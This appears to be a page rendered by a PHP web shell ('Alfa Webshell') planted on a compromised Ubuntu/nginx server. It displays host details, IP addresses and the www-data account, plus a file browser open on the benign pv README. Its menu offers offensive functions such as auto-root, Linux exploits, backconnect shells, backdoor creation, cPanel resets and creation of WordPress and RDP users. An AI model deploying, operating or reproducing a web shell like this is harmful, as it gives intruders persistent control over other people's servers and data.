Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pv /
[ HOME SHELL ]
Name
Size
Permission
Action
ACKNOWLEDGEMENTS.md.gz
3.71
KB
-rw-r--r--
COPYING.gz
11.84
KB
-rw-r--r--
DEVELOPERS.md.gz
2.53
KB
-rw-r--r--
NEWS.md.gz
9.4
KB
-rw-r--r--
README.md
2.43
KB
-rw-r--r--
TODO.md
3.45
KB
-rw-r--r--
benchmark.sh
1.05
KB
-rw-r--r--
changelog.Debian.gz
855
B
-rw-r--r--
copyright
782
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# Introduction This is the README for **pv** ("Pipe Viewer"), a terminal-based tool for monitoring the progress of data through a pipeline. It can be inserted into any normal pipeline between two processes to give a visual indication of how quickly data is passing through, how long it has taken, how near to completion it is, and an estimate of how long it will be until completion. # Documentation A manual page is included in this distribution ("`man pv`"). Before installation, it is in "[docs/pv.1](./docs/pv.1.md)". Changes are listed in "[docs/NEWS.md](./docs/NEWS.md)". The to-do list is "[docs/TODO.md](./docs/TODO.md)". Developers and translators, please see "[docs/DEVELOPERS.md](./docs/DEVELOPERS.md)". # Compilation To compile the package, type "`sh ./configure`", which should generate a Makefile for your system. You may then type "`make`" to build everything, and "`make install`" to install it. See the file "[docs/INSTALL](./docs/INSTALL)" for more about the _configure_ script. If this is not a packaged release, you will need the GNU build system tools (`autoconf`, `aclocal`, `autopoint`, `automake`) and the `gettext` development tools. You can then run "`autoreconf -is`" to generate the "`configure`" script. # Copyright, bug reporting, and acknowledgements Copyright (C) 2002-2008, 2010, 2012-2015, 2017, 2021, 2023 Andrew Wood. License GPLv3+: GNU GPL version 3 or later <https://www.gnu.org/licenses/gpl-3.0.html>. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License, version 3, in "[docs/COPYING](./docs/COPYING)". If not, see <https://www.gnu.org/licenses/gpl-3.0.html>. Please report any bugs to **pv@ivarch.com**, or use the issue tracker linked from the **pv** home page. The **pv** home page is at: [https://www.ivarch.com/programs/pv.shtml](https://www.ivarch.com/programs/pv.shtml) The latest version can always be found here. **Please see "[docs/ACKNOWLEDGEMENTS.md](./docs/ACKNOWLEDGEMENTS.md)" for a list of contributors.** ---
Close